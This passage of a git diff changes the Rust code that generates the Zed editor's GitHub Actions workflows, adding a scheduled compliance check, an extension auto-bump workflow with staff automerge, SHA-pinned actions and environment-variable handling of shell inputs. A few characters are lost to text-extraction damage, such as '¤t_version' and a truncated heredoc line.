perf-test -p {crate_name} -- --json={ref_name}; + named::bash( + r#" + if [ -n "$CRATE_NAME" ]; then + cargo perf-test -p "$CRATE_NAME" -- --json="$REF_NAME"; else - cargo perf-test -p vim -- --json={ref_name}; - fi" - )) + cargo perf-test -p vim -- --json="$REF_NAME"; + fi"#, + ) + .add_env(("REF_NAME", ref_name.to_string())) + .add_env(("CRATE_NAME", crate_name.to_string())) } fn install_hyperfine() -> Step { - named::uses("taiki-e", "install-action", "hyperfine") + named::uses( + "taiki-e", + "install-action", + "b4f2d5cb8597b15997c8ede873eb6185efc5f0ad", // hyperfine + ) } fn compare_runs(head: &WorkflowInput, base: &WorkflowInput) -> Step { - named::bash(&format!( - "cargo perf-compare --save=results.md {base} {head}" - )) + named::bash(r#"cargo perf-compare --save=results.md "$BASE" "$HEAD""#) + .add_env(("BASE", base.to_string())) + .add_env(("HEAD", head.to_string())) } named::job( diff --git a/tooling/xtask/src/tasks/workflows/compliance_check.rs b/tooling/xtask/src/tasks/workflows/compliance_check.rs new file mode 100644 index 0000000000000000000000000000000000000000..9e2f4ae1e588c545266ec5a8246ac9781c6b668b --- /dev/null +++ b/tooling/xtask/src/tasks/workflows/compliance_check.rs @@ -0,0 +1,66 @@ +use gh_workflow::{Event, Expression, Job, Run, Schedule, Step, Workflow}; + +use crate::tasks::workflows::{ + runners, + steps::{self, CommonJobConditions, named}, + vars::{self, StepOutput}, +}; + +pub fn compliance_check() -> Workflow { + let check = scheduled_compliance_check(); + + named::workflow() + .on(Event::default().schedule([Schedule::new("30 17 * * 2")])) + .add_env(("CARGO_TERM_COLOR", "always")) + .add_job(check.name, check.job) +} + +fn scheduled_compliance_check() -> steps::NamedJob { + let determine_version_step = named::bash(indoc::indoc! 
{r#" + VERSION=$(sed -n 's/^version = "\(.*\)"/\1/p' crates/zed/Cargo.toml | tr -d '[:space:]') + if [ -z "$VERSION" ]; then + echo "Could not determine version from crates/zed/Cargo.toml" + exit 1 + fi + TAG="v${VERSION}-pre" + echo "Checking compliance for $TAG" + echo "tag=$TAG" >> "$GITHUB_OUTPUT" + "#}) + .id("determine-version"); + + let tag_output = StepOutput::new(&determine_version_step, "tag"); + + fn run_compliance_check(tag: &StepOutput) -> Step { + named::bash( + r#"cargo xtask compliance "$LATEST_TAG" --branch main --report-path target/compliance-report"#, + ) + .id("run-compliance-check") + .add_env(("LATEST_TAG", tag.to_string())) + .add_env(("GITHUB_APP_ID", vars::ZED_ZIPPY_APP_ID)) + .add_env(("GITHUB_APP_KEY", vars::ZED_ZIPPY_APP_PRIVATE_KEY)) + } + + fn send_failure_slack_notification(tag: &StepOutput) -> Step { + named::bash(indoc::indoc! {r#" + MESSAGE="⚠️ Scheduled compliance check failed for upcoming preview release $LATEST_TAG: There are PRs with missing reviews." 
+ + curl -X POST -H 'Content-type: application/json' \ + --data "$(jq -n --arg text "$MESSAGE" '{"text": $text}')" \ + "$SLACK_WEBHOOK" + "#}) + .if_condition(Expression::new("failure()")) + .add_env(("SLACK_WEBHOOK", vars::SLACK_WEBHOOK_WORKFLOW_FAILURES)) + .add_env(("LATEST_TAG", tag.to_string())) + } + + named::job( + Job::default() + .with_repository_owner_guard() + .runs_on(runners::LINUX_SMALL) + .add_step(steps::checkout_repo().with_full_history()) + .add_step(steps::cache_rust_dependencies_namespace()) + .add_step(determine_version_step) + .add_step(run_compliance_check(&tag_output)) + .add_step(send_failure_slack_notification(&tag_output)), + ) +} diff --git a/tooling/xtask/src/tasks/workflows/deploy_collab.rs b/tooling/xtask/src/tasks/workflows/deploy_collab.rs index 58212118c7ba4fa6d44d5f29fac671ca6eb5e662..c6b620bd5d54c18ddad3796b414e1ba04c90f530 100644 --- a/tooling/xtask/src/tasks/workflows/deploy_collab.rs +++ b/tooling/xtask/src/tasks/workflows/deploy_collab.rs @@ -1,9 +1,9 @@ use gh_workflow::{Container, Event, Port, Push, Run, Step, Use, Workflow}; -use indoc::{formatdoc, indoc}; +use indoc::indoc; use crate::tasks::workflows::runners::{self, Platform}; use crate::tasks::workflows::steps::{ - self, CommonJobConditions, FluentBuilder as _, NamedJob, dependant_job, named, + self, CommonJobConditions, FluentBuilder as _, NamedJob, dependant_job, named, use_clang, }; use crate::tasks::workflows::vars; @@ -23,7 +23,7 @@ pub(crate) fn deploy_collab() -> Workflow { } fn style() -> NamedJob { - named::job( + named::job(use_clang( dependant_job(&[]) .name("Check formatting and Clippy lints") .with_repository_owner_guard() @@ -33,8 +33,8 @@ fn style() -> NamedJob { .add_step(steps::cache_rust_dependencies_namespace()) .map(steps::install_linux_dependencies) .add_step(steps::cargo_fmt()) - .add_step(steps::clippy(Platform::Linux)), - ) + .add_step(steps::clippy(Platform::Linux, None)), + )) } fn tests(deps: &[&NamedJob]) -> NamedJob { @@ -42,7 +42,7 @@ fn 
tests(deps: &[&NamedJob]) -> NamedJob { named::bash("cargo nextest run --package collab --no-fail-fast") } - named::job( + named::job(use_clang( dependant_job(deps) .name("Run tests") .runs_on(runners::LINUX_XL) @@ -65,7 +65,7 @@ fn tests(deps: &[&NamedJob]) -> NamedJob { .add_step(steps::cargo_install_nextest()) .add_step(steps::clear_target_dir_if_large(Platform::Linux)) .add_step(run_collab_tests()), - ) + )) } fn publish(deps: &[&NamedJob]) -> NamedJob { @@ -115,9 +115,10 @@ fn deploy(deps: &[&NamedJob]) -> NamedJob { } fn sign_into_kubernetes() -> Step { - named::bash(formatdoc! {r#" - doctl kubernetes cluster kubeconfig save --expiry-seconds 600 {cluster_name} - "#, cluster_name = vars::CLUSTER_NAME}) + named::bash( + r#"doctl kubernetes cluster kubeconfig save --expiry-seconds 600 "$CLUSTER_NAME""#, + ) + .add_env(("CLUSTER_NAME", vars::CLUSTER_NAME)) } fn start_rollout() -> Step { @@ -139,7 +140,7 @@ fn deploy(deps: &[&NamedJob]) -> NamedJob { echo "Deploying collab:$GITHUB_SHA to $ZED_KUBE_NAMESPACE" source script/lib/deploy-helpers.sh - export_vars_for_environment $ZED_KUBE_NAMESPACE + export_vars_for_environment "$ZED_KUBE_NAMESPACE" ZED_DO_CERTIFICATE_ID="$(doctl compute certificate list --format ID --no-header)" export ZED_DO_CERTIFICATE_ID @@ -149,14 +150,14 @@ fn deploy(deps: &[&NamedJob]) -> NamedJob { export ZED_LOAD_BALANCER_SIZE_UNIT=$ZED_COLLAB_LOAD_BALANCER_SIZE_UNIT export DATABASE_MAX_CONNECTIONS=850 envsubst < crates/collab/k8s/collab.template.yml | kubectl apply -f - - kubectl -n "$ZED_KUBE_NAMESPACE" rollout status deployment/$ZED_SERVICE_NAME --watch + kubectl -n "$ZED_KUBE_NAMESPACE" rollout status "deployment/$ZED_SERVICE_NAME" --watch echo "deployed ${ZED_SERVICE_NAME} to ${ZED_KUBE_NAMESPACE}" export ZED_SERVICE_NAME=api export ZED_LOAD_BALANCER_SIZE_UNIT=$ZED_API_LOAD_BALANCER_SIZE_UNIT export DATABASE_MAX_CONNECTIONS=60 envsubst < crates/collab/k8s/collab.template.yml | kubectl apply -f - - kubectl -n "$ZED_KUBE_NAMESPACE" rollout 
status deployment/$ZED_SERVICE_NAME --watch + kubectl -n "$ZED_KUBE_NAMESPACE" rollout status "deployment/$ZED_SERVICE_NAME" --watch echo "deployed ${ZED_SERVICE_NAME} to ${ZED_KUBE_NAMESPACE}" "#}) } diff --git a/tooling/xtask/src/tasks/workflows/extension_auto_bump.rs b/tooling/xtask/src/tasks/workflows/extension_auto_bump.rs new file mode 100644 index 0000000000000000000000000000000000000000..e69c783299aa18c3d97f78b4fb12355bd0215450 --- /dev/null +++ b/tooling/xtask/src/tasks/workflows/extension_auto_bump.rs @@ -0,0 +1,113 @@ +use gh_workflow::{ + Event, Expression, Input, Job, Level, Permissions, Push, Strategy, UsesJob, Workflow, +}; +use indoc::indoc; +use serde_json::json; + +use crate::tasks::workflows::{ + extensions::WithAppSecrets, + run_tests::DETECT_CHANGED_EXTENSIONS_SCRIPT, + runners, + steps::{self, CommonJobConditions, NamedJob, named}, + vars::{StepOutput, one_workflow_per_non_main_branch}, +}; + +/// Generates a workflow that triggers on push to main, detects changed extensions +/// in the `extensions/` directory, and invokes the `extension_bump` reusable workflow +/// for each changed extension via a matrix strategy. +pub(crate) fn extension_auto_bump() -> Workflow { + let detect = detect_changed_extensions(); + let bump = bump_extension_versions(&detect); + + named::workflow() + .add_event( + Event::default().push( + Push::default() + .add_branch("main") + .add_path("extensions/**") + .add_path("!extensions/test-extension/**") + .add_path("!extensions/workflows/**") + .add_path("!extensions/*.md"), + ), + ) + .concurrency(one_workflow_per_non_main_branch()) + .add_job(detect.name, detect.job) + .add_job(bump.name, bump.job) +} + +fn detect_changed_extensions() -> NamedJob { + let preamble = indoc! {r#" + COMPARE_REV="$(git rev-parse HEAD~1)" + CHANGED_FILES="$(git diff --name-only "$COMPARE_REV" "$GITHUB_SHA")" + "#}; + + let filter_newly_added = indoc! 
{r#" + # Filter out newly added extensions + FILTERED="[]" + for ext in $(echo "$EXTENSIONS_JSON" | jq -r '.[]'); do + if git show HEAD~1:"$ext/extension.toml" >/dev/null 2>&1; then + FILTERED=$(echo "$FILTERED" | jq -c --arg e "$ext" '. + [$e]') + fi + done + echo "changed_extensions=$FILTERED" >> "$GITHUB_OUTPUT" + "#}; + + let script = format!( + "{preamble}{detect}{filter}", + preamble = preamble, + detect = DETECT_CHANGED_EXTENSIONS_SCRIPT, + filter = filter_newly_added, + ); + + let step = named::bash(script).id("detect"); + + let output = StepOutput::new(&step, "changed_extensions"); + + let job = Job::default() + .with_repository_owner_guard() + .runs_on(runners::LINUX_SMALL) + .timeout_minutes(5u32) + .add_step(steps::checkout_repo().with_custom_fetch_depth(2)) + .add_step(step) + .outputs([("changed_extensions".to_owned(), output.to_string())]); + + named::job(job) +} + +fn bump_extension_versions(detect_job: &NamedJob) -> NamedJob { + let job = Job::default() + .needs(vec![detect_job.name.clone()]) + .cond(Expression::new(format!( + "needs.{}.outputs.changed_extensions != '[]'", + detect_job.name + ))) + .permissions( + Permissions::default() + .contents(Level::Write) + .issues(Level::Write) + .pull_requests(Level::Write) + .actions(Level::Write), + ) + .strategy( + Strategy::default() + .fail_fast(false) + // TODO: Remove the limit. We currently need this to workaround the concurrency group issue + // where different matrix jobs would be placed in the same concurrency group and thus cancelled. 
+ .max_parallel(1u32) + .matrix(json!({ + "extension": format!( + "${{{{ fromJson(needs.{}.outputs.changed_extensions) }}}}", + detect_job.name + ) + })), + ) + .uses_local(".github/workflows/extension_bump.yml") + .with( + Input::default() + .add("working-directory", "${{ matrix.extension }}") + .add("force-bump", false), + ) + .with_app_secrets(); + + named::job(job) +} diff --git a/tooling/xtask/src/tasks/workflows/extension_bump.rs b/tooling/xtask/src/tasks/workflows/extension_bump.rs index 746b842f18dfcc8805be9285facefdfa52085b84..77d2acf7c830302407207950b1919b9002049460 100644 --- a/tooling/xtask/src/tasks/workflows/extension_bump.rs +++ b/tooling/xtask/src/tasks/workflows/extension_bump.rs @@ -5,11 +5,13 @@ use crate::tasks::workflows::{ extension_tests::{self}, runners, steps::{ - self, CommonJobConditions, DEFAULT_REPOSITORY_OWNER_GUARD, FluentBuilder, NamedJob, - checkout_repo, dependant_job, named, + self, BASH_SHELL, CommonJobConditions, DEFAULT_REPOSITORY_OWNER_GUARD, NamedJob, + RepositoryTarget, cache_rust_dependencies_namespace, checkout_repo, dependant_job, + generate_token, named, }, vars::{ - JobOutput, StepOutput, WorkflowInput, WorkflowSecret, one_workflow_per_non_main_branch, + JobOutput, StepOutput, WorkflowInput, WorkflowSecret, + one_workflow_per_non_main_branch_and_token, }, }; @@ -22,6 +24,7 @@ pub(crate) fn extension_bump() -> Workflow { // TODO: Ideally, this would have a default of `false`, but this is currently not // supported in gh-workflows let force_bump = WorkflowInput::bool("force-bump", None); + let working_directory = WorkflowInput::string("working-directory", Some(".".to_owned())); let (app_id, app_secret) = extension_workflow_secrets(); let (check_version_changed, version_changed, current_version) = check_version_changed(); @@ -39,16 +42,17 @@ pub(crate) fn extension_bump() -> Workflow { &app_id, &app_secret, ); - let create_label = create_version_label( + let (create_label, tag) = create_version_label( &dependencies, 
&version_changed, ¤t_version, &app_id, &app_secret, ); + let tag = tag.as_job_output(&create_label); let trigger_release = trigger_release( &[&check_version_changed, &create_label], - current_version, + tag, &app_id, &app_secret, ); @@ -59,6 +63,7 @@ pub(crate) fn extension_bump() -> Workflow { WorkflowCall::default() .add_input(bump_type.name, bump_type.call_input()) .add_input(force_bump.name, force_bump.call_input()) + .add_input(working_directory.name, working_directory.call_input()) .secrets([ (app_id.name.to_owned(), app_id.secret_configuration()), ( @@ -68,7 +73,7 @@ pub(crate) fn extension_bump() -> Workflow { ]), ), ) - .concurrency(one_workflow_per_non_main_branch()) + .concurrency(one_workflow_per_non_main_branch_and_token("extension-bump")) .add_env(("CARGO_TERM_COLOR", "always")) .add_env(("RUST_BACKTRACE", 1)) .add_env(("CARGO_INCREMENTAL", 0)) @@ -82,10 +87,19 @@ pub(crate) fn extension_bump() -> Workflow { .add_job(trigger_release.name, trigger_release.job) } +fn extension_job_defaults() -> Defaults { + Defaults::default().run( + RunDefaults::default() + .shell(BASH_SHELL) + .working_directory("${{ inputs.working-directory }}"), + ) +} + fn check_version_changed() -> (NamedJob, StepOutput, StepOutput) { let (compare_versions, version_changed, current_version) = compare_versions(); let job = Job::default() + .defaults(extension_job_defaults()) .with_repository_owner_guard() .outputs([ (version_changed.name.to_owned(), version_changed.to_string()), @@ -108,26 +122,35 @@ fn create_version_label( current_version: &JobOutput, app_id: &WorkflowSecret, app_secret: &WorkflowSecret, -) -> NamedJob { +) -> (NamedJob, StepOutput) { let (generate_token, generated_token) = - generate_token(&app_id.to_string(), &app_secret.to_string(), None); + generate_token(&app_id.to_string(), &app_secret.to_string()).into(); + let (determine_tag_step, tag) = determine_tag(current_version); let job = steps::dependant_job(dependencies) + .defaults(extension_job_defaults()) 
.cond(Expression::new(format!( "{DEFAULT_REPOSITORY_OWNER_GUARD} && github.event_name == 'push' && \ github.ref == 'refs/heads/main' && {version_changed} == 'true'", version_changed = version_changed_output.expr(), ))) + .outputs([(tag.name.to_owned(), tag.to_string())]) .runs_on(runners::LINUX_SMALL) .timeout_minutes(1u32) .add_step(generate_token) .add_step(steps::checkout_repo()) - .add_step(create_version_tag(current_version, generated_token)); + .add_step(determine_tag_step) + .add_step(create_version_tag(&tag, generated_token)); - named::job(job) + (named::job(job), tag) } -fn create_version_tag(current_version: &JobOutput, generated_token: StepOutput) -> Step { - named::uses("actions", "github-script", "v7").with( +fn create_version_tag(tag: &StepOutput, generated_token: StepOutput) -> Step { + named::uses( + "actions", + "github-script", + "f28e40c7f34bde8b3046d885e986cb6290c5673b", // v7 + ) + .with( Input::default() .add( "script", @@ -135,7 +158,7 @@ fn create_version_tag(current_version: &JobOutput, generated_token: StepOutput) github.rest.git.createRef({{ owner: context.repo.owner, repo: context.repo.repo, - ref: 'refs/tags/v{current_version}', + ref: 'refs/tags/{tag}', sha: context.sha }})"# }, @@ -144,17 +167,35 @@ fn create_version_tag(current_version: &JobOutput, generated_token: StepOutput) ) } +fn determine_tag(current_version: &JobOutput) -> (Step, StepOutput) { + let step = named::bash(formatdoc! {r#" + EXTENSION_ID="$(sed -n 's/^id = "\(.*\)"/\1/p' < extension.toml | head -1 | tr -d '[:space:]')" + + if [[ "$WORKING_DIR" == "." 
|| -z "$WORKING_DIR" ]]; then + TAG="v${{CURRENT_VERSION}}" + else + TAG="${{EXTENSION_ID}}-v${{CURRENT_VERSION}}" + fi + + echo "tag=${{TAG}}" >> "$GITHUB_OUTPUT" + "#}) + .id("determine-tag") + .add_env(("CURRENT_VERSION", current_version.to_string())) + .add_env(("WORKING_DIR", "${{ inputs.working-directory }}")); + + let tag = StepOutput::new(&step, "tag"); + (step, tag) +} + /// Compares the current and previous commit and checks whether versions changed inbetween. pub(crate) fn compare_versions() -> (Step, StepOutput, StepOutput) { let check_needs_bump = named::bash(formatdoc! { r#" CURRENT_VERSION="$({VERSION_CHECK})" - if [[ "${{{{ github.event_name }}}}" == "pull_request" ]]; then + if [[ "$GITHUB_EVENT_NAME" == "pull_request" ]]; then PR_FORK_POINT="$(git merge-base origin/main HEAD)" git checkout "$PR_FORK_POINT" - elif BRANCH_PARENT_SHA="$(git merge-base origin/main origin/zed-zippy-autobump)"; then - git checkout "$BRANCH_PARENT_SHA" else git checkout "$(git log -1 --format=%H)"~1 fi @@ -186,69 +227,34 @@ fn bump_extension_version( app_secret: &WorkflowSecret, ) -> NamedJob { let (generate_token, generated_token) = - generate_token(&app_id.to_string(), &app_secret.to_string(), None); - let (bump_version, new_version) = bump_version(current_version, bump_type); + generate_token(&app_id.to_string(), &app_secret.to_string()).into(); + let (bump_version, _new_version, title, body, branch_name) = + bump_version(current_version, bump_type); let job = steps::dependant_job(dependencies) + .defaults(extension_job_defaults()) .cond(Expression::new(format!( "{DEFAULT_REPOSITORY_OWNER_GUARD} &&\n({force_bump} == true || {version_changed} == 'false')", force_bump = force_bump_output.expr(), version_changed = version_changed_output.expr(), ))) .runs_on(runners::LINUX_SMALL) - .timeout_minutes(3u32) + .timeout_minutes(5u32) .add_step(generate_token) .add_step(steps::checkout_repo()) + .add_step(cache_rust_dependencies_namespace()) .add_step(install_bump_2_version()) 
.add_step(bump_version) - .add_step(create_pull_request(new_version, generated_token)); + .add_step(create_pull_request( + title, + body, + generated_token, + branch_name, + )); named::job(job) } -pub(crate) fn generate_token( - app_id_source: &str, - app_secret_source: &str, - repository_target: Option, -) -> (Step, StepOutput) { - let step = named::uses("actions", "create-github-app-token", "v2") - .id("generate-token") - .add_with( - Input::default() - .add("app-id", app_id_source) - .add("private-key", app_secret_source) - .when_some( - repository_target, - |input, - RepositoryTarget { - owner, - repositories, - permissions, - }| { - input - .when_some(owner, |input, owner| input.add("owner", owner)) - .when_some(repositories, |input, repositories| { - input.add("repositories", repositories) - }) - .when_some(permissions, |input, permissions| { - permissions - .into_iter() - .fold(input, |input, (permission, level)| { - input.add( - permission, - serde_json::to_value(&level).unwrap_or_default(), - ) - }) - }) - }, - ), - ); - - let generated_token = StepOutput::new(&step, "token"); - - (step, generated_token) -} - fn install_bump_2_version() -> Step { named::run( runners::Platform::Linux, @@ -256,10 +262,11 @@ fn install_bump_2_version() -> Step { ) } -fn bump_version(current_version: &JobOutput, bump_type: &WorkflowInput) -> (Step, StepOutput) { +fn bump_version( + current_version: &JobOutput, + bump_type: &WorkflowInput, +) -> (Step, StepOutput, StepOutput, StepOutput, StepOutput) { let step = named::bash(formatdoc! 
{r#" - OLD_VERSION="{current_version}" - BUMP_FILES=("extension.toml") if [[ -f "Cargo.toml" ]]; then BUMP_FILES+=("Cargo.toml") @@ -269,38 +276,68 @@ fn bump_version(current_version: &JobOutput, bump_type: &WorkflowInput) -> (Step --search "version = \"{{current_version}}"\" \ --replace "version = \"{{new_version}}"\" \ --current-version "$OLD_VERSION" \ - --no-configured-files {bump_type} "${{BUMP_FILES[@]}}" + --no-configured-files "$BUMP_TYPE" "${{BUMP_FILES[@]}}" if [[ -f "Cargo.toml" ]]; then - cargo update --workspace + cargo +stable update --workspace fi NEW_VERSION="$({VERSION_CHECK})" + EXTENSION_ID="$(sed -n 's/^id = "\(.*\)"/\1/p' < extension.toml | head -1 | tr -d '[:space:]')" + EXTENSION_NAME="$(sed -n 's/^name = "\(.*\)"/\1/p' < extension.toml | head -1 | tr -d '[:space:]')" + + if [[ "$WORKING_DIR" == "." || -z "$WORKING_DIR" ]]; then + {{ + echo "title=Bump version to ${{NEW_VERSION}}"; + echo "body=This PR bumps the version of this extension to v${{NEW_VERSION}}"; + echo "branch_name=zed-zippy-autobump"; + }} >> "$GITHUB_OUTPUT" + else + {{ + echo "title=${{EXTENSION_ID}}: Bump to v${{NEW_VERSION}}"; + echo "body<> "$GITHUB_OUTPUT" + fi echo "new_version=${{NEW_VERSION}}" >> "$GITHUB_OUTPUT" "# }) - .id("bump-version"); + .id("bump-version") + .add_env(("OLD_VERSION", current_version.to_string())) + .add_env(("BUMP_TYPE", bump_type.to_string())) + .add_env(("WORKING_DIR", "${{ inputs.working-directory }}")); let new_version = StepOutput::new(&step, "new_version"); - (step, new_version) + let title = StepOutput::new(&step, "title"); + let body = StepOutput::new(&step, "body"); + let branch_name = StepOutput::new(&step, "branch_name"); + (step, new_version, title, body, branch_name) } -fn create_pull_request(new_version: StepOutput, generated_token: StepOutput) -> Step { - let formatted_version = format!("v{new_version}"); - - named::uses("peter-evans", "create-pull-request", "v7").with( +fn create_pull_request( + title: StepOutput, + body: 
StepOutput, + generated_token: StepOutput, + branch_name: StepOutput, +) -> Step { + named::uses( + "peter-evans", + "create-pull-request", + "98357b18bf14b5342f975ff684046ec3b2a07725", + ) + .with( Input::default() - .add("title", format!("Bump version to {new_version}")) - .add( - "body", - format!("This PR bumps the version of this extension to {formatted_version}",), - ) - .add( - "commit-message", - format!("Bump version to {formatted_version}"), - ) - .add("branch", "zed-zippy-autobump") + .add("title", title.to_string()) + .add("body", body.to_string()) + .add("commit-message", title.to_string()) + .add("branch", branch_name.to_string()) .add( "committer", "zed-zippy[bot] <234243425+zed-zippy[bot]@users.noreply.github.com>", @@ -315,25 +352,30 @@ fn create_pull_request(new_version: StepOutput, generated_token: StepOutput) -> fn trigger_release( dependencies: &[&NamedJob], - version: JobOutput, + tag: JobOutput, app_id: &WorkflowSecret, app_secret: &WorkflowSecret, ) -> NamedJob { let extension_registry = RepositoryTarget::new("zed-industries", &["extensions"]); - let (generate_token, generated_token) = generate_token( - &app_id.to_string(), - &app_secret.to_string(), - Some(extension_registry), - ); + let (generate_token, generated_token) = + generate_token(&app_id.to_string(), &app_secret.to_string()) + .for_repository(extension_registry) + .into(); let (get_extension_id, extension_id) = get_extension_id(); + let (release_action, pull_request_number) = release_action(extension_id, tag, &generated_token); let job = dependant_job(dependencies) + .defaults(extension_job_defaults()) .with_repository_owner_guard() .runs_on(runners::LINUX_SMALL) .add_step(generate_token) .add_step(checkout_repo()) .add_step(get_extension_id) - .add_step(release_action(extension_id, version, generated_token)); + .add_step(release_action) + .add_step(enable_automerge_if_staff( + pull_request_number, + generated_token, + )); named::job(job) } @@ -354,14 +396,98 @@ fn 
get_extension_id() -> (Step, StepOutput) { fn release_action( extension_id: StepOutput, - version: JobOutput, + tag: JobOutput, + generated_token: &StepOutput, +) -> (Step, StepOutput) { + let step = named::uses( + "huacnlee", + "zed-extension-action", + "82920ff0876879f65ffbcfa3403589114a8919c6", + ) + .id("extension-update") + .add_with(("extension-name", extension_id.to_string())) + .add_with(("push-to", "zed-industries/extensions")) + .add_with(("tag", tag.to_string())) + .add_env(("COMMITTER_TOKEN", generated_token.to_string())); + + let pull_request_number = StepOutput::new(&step, "pull-request-number"); + + (step, pull_request_number) +} + +fn enable_automerge_if_staff( + pull_request_number: StepOutput, generated_token: StepOutput, ) -> Step { - named::uses("huacnlee", "zed-extension-action", "v2") - .add_with(("extension-name", extension_id.to_string())) - .add_with(("push-to", "zed-industries/extensions")) - .add_with(("tag", format!("v{version}"))) - .add_env(("COMMITTER_TOKEN", generated_token.to_string())) + named::uses( + "actions", + "github-script", + "f28e40c7f34bde8b3046d885e986cb6290c5673b", // v7 + ) + .add_with(("github-token", generated_token.to_string())) + .add_with(( + "script", + indoc! 
{r#" + const prNumber = process.env.PR_NUMBER; + if (!prNumber) { + console.log('No pull request number set, skipping automerge.'); + return; + } + + const author = process.env.GITHUB_ACTOR; + let isStaff = false; + try { + const response = await github.rest.teams.getMembershipForUserInOrg({ + org: 'zed-industries', + team_slug: 'staff', + username: author + }); + isStaff = response.data.state === 'active'; + } catch (error) { + if (error.status !== 404) { + throw error; + } + } + + if (!isStaff) { + console.log(`Actor ${author} is not a staff member, skipping automerge.`); + return; + } + + // Assign staff member responsible for the bump + const pullNumber = parseInt(prNumber); + + await github.rest.issues.addAssignees({ + owner: 'zed-industries', + repo: 'extensions', + issue_number: pullNumber, + assignees: [author] + }); + console.log(`Assigned ${author} to PR #${prNumber} in zed-industries/extensions`); + + // Get the GraphQL node ID + const { data: pr } = await github.rest.pulls.get({ + owner: 'zed-industries', + repo: 'extensions', + pull_number: pullNumber + }); + + await github.graphql(` + mutation($pullRequestId: ID!) 
{ + enablePullRequestAutoMerge(input: { pullRequestId: $pullRequestId, mergeMethod: SQUASH }) { + pullRequest { + autoMergeRequest { + enabledAt + } + } + } + } + `, { pullRequestId: pr.node_id }); + + console.log(`Automerge enabled for PR #${prNumber} in zed-industries/extensions`); + "#}, + )) + .add_env(("PR_NUMBER", pull_request_number.to_string())) } fn extension_workflow_secrets() -> (WorkflowSecret, WorkflowSecret) { @@ -371,34 +497,3 @@ fn extension_workflow_secrets() -> (WorkflowSecret, WorkflowSecret) { (app_id, app_secret) } - -pub(crate) struct RepositoryTarget { - owner: Option, - repositories: Option, - permissions: Option>, -} - -impl RepositoryTarget { - pub fn new(owner: T, repositories: &[&str]) -> Self { - Self { - owner: Some(owner.to_string()), - repositories: Some(repositories.join("\n")), - permissions: None, - } - } - - pub fn current() -> Self { - Self { - owner: None, - repositories: None, - permissions: None, - } - } - - pub fn permissions(self, permissions: impl Into>) -> Self { - Self { - permissions: Some(permissions.into()), - ..self - } - } -} diff --git a/tooling/xtask/src/tasks/workflows/extension_tests.rs b/tooling/xtask/src/tasks/workflows/extension_tests.rs index a650013bacfcfc1ac89a60ccfe8674a5621fb1c7..d724afc1353b0aa9205706c5f23eb0d0ee8e96c9 100644 --- a/tooling/xtask/src/tasks/workflows/extension_tests.rs +++ b/tooling/xtask/src/tasks/workflows/extension_tests.rs @@ -1,18 +1,18 @@ use gh_workflow::*; -use indoc::{formatdoc, indoc}; +use indoc::indoc; use crate::tasks::workflows::{ extension_bump::compare_versions, - run_tests::{orchestrate_without_package_filter, tests_pass}, + run_tests::{fetch_ts_query_ls, orchestrate_for_extension, run_ts_query_ls, tests_pass}, runners, steps::{ - self, CommonJobConditions, FluentBuilder, NamedJob, cache_rust_dependencies_namespace, - named, + self, BASH_SHELL, CommonJobConditions, FluentBuilder, NamedJob, + cache_rust_dependencies_namespace, named, }, - vars::{PathCondition, StepOutput, 
one_workflow_per_non_main_branch}, + vars::{PathCondition, StepOutput, WorkflowInput, one_workflow_per_non_main_branch_and_token}, }; -pub(crate) const ZED_EXTENSION_CLI_SHA: &str = "03d8e9aee95ea6117d75a48bcac2e19241f6e667"; +pub(crate) const ZED_EXTENSION_CLI_SHA: &str = "1fa7f1a3ec28ea1eae6db2e937d7a538fb10c0c7"; // This should follow the set target in crates/extension/src/extension_builder.rs const EXTENSION_RUST_TARGET: &str = "wasm32-wasip2"; @@ -23,8 +23,10 @@ pub(crate) fn extension_tests() -> Workflow { let should_check_extension = PathCondition::new("check_extension", r"^(extension\.toml|.*\.scm)$"); - let orchestrate = - orchestrate_without_package_filter(&[&should_check_rust, &should_check_extension]); + let orchestrate = with_extension_defaults(orchestrate_for_extension(&[ + &should_check_rust, + &should_check_extension, + ])); let jobs = [ orchestrate, @@ -32,11 +34,20 @@ pub(crate) fn extension_tests() -> Workflow { should_check_extension.guard(check_extension()), ]; - let tests_pass = tests_pass(&jobs); + let tests_pass = tests_pass(&jobs, &[]); + + let working_directory = WorkflowInput::string("working-directory", Some(".".to_owned())); named::workflow() - .add_event(Event::default().workflow_call(WorkflowCall::default())) - .concurrency(one_workflow_per_non_main_branch()) + .add_event( + Event::default().workflow_call( + WorkflowCall::default() + .add_input(working_directory.name, working_directory.call_input()), + ), + ) + .concurrency(one_workflow_per_non_main_branch_and_token( + "extension-tests", + )) .add_env(("CARGO_TERM_COLOR", "always")) .add_env(("RUST_BACKTRACE", 1)) .add_env(("CARGO_INCREMENTAL", 0)) @@ -56,27 +67,66 @@ fn install_rust_target() -> Step { named::bash(format!("rustup target add {EXTENSION_RUST_TARGET}",)) } -fn run_clippy() -> Step { - named::bash("cargo clippy --release --all-features -- --deny warnings") +fn get_package_name() -> (Step, StepOutput) { + let step = named::bash(indoc! 
{r#" + PACKAGE_NAME="$(sed -n 's/^name = "\(.*\)"/\1/p' < Cargo.toml | head -1 | tr -d '[:space:]')" + echo "package_name=${PACKAGE_NAME}" >> "$GITHUB_OUTPUT" + "#}) + .id("get-package-name"); + + let output = StepOutput::new(&step, "package_name"); + (step, output) +} + +fn cargo_fmt_package(package_name: &StepOutput) -> Step { + named::bash(r#"cargo fmt -p "$PACKAGE_NAME" -- --check"#) + .add_env(("PACKAGE_NAME", package_name.to_string())) +} + +fn run_clippy(package_name: &StepOutput) -> Step { + named::bash(r#"cargo clippy -p "$PACKAGE_NAME" --release --all-features -- --deny warnings"#) + .add_env(("PACKAGE_NAME", package_name.to_string())) +} + +fn run_nextest(package_name: &StepOutput) -> Step { + named::bash( + r#"cargo nextest run -p "$PACKAGE_NAME" --no-fail-fast --no-tests=warn --target "$(rustc -vV | sed -n 's|host: ||p')""#, + ) + .add_env(("PACKAGE_NAME", package_name.to_string())) + .add_env(("NEXTEST_NO_TESTS", "warn")) +} + +fn extension_job_defaults() -> Defaults { + Defaults::default().run( + RunDefaults::default() + .shell(BASH_SHELL) + .working_directory("${{ inputs.working-directory }}"), + ) +} + +fn with_extension_defaults(named_job: NamedJob) -> NamedJob { + NamedJob { + name: named_job.name, + job: named_job.job.defaults(extension_job_defaults()), + } } fn check_rust() -> NamedJob { + let (get_package, package_name) = get_package_name(); + let job = Job::default() + .defaults(extension_job_defaults()) .with_repository_owner_guard() .runs_on(runners::LINUX_LARGE_RAM) .timeout_minutes(6u32) .add_step(steps::checkout_repo()) .add_step(steps::cache_rust_dependencies_namespace()) .add_step(install_rust_target()) - .add_step(steps::cargo_fmt()) - .add_step(run_clippy()) + 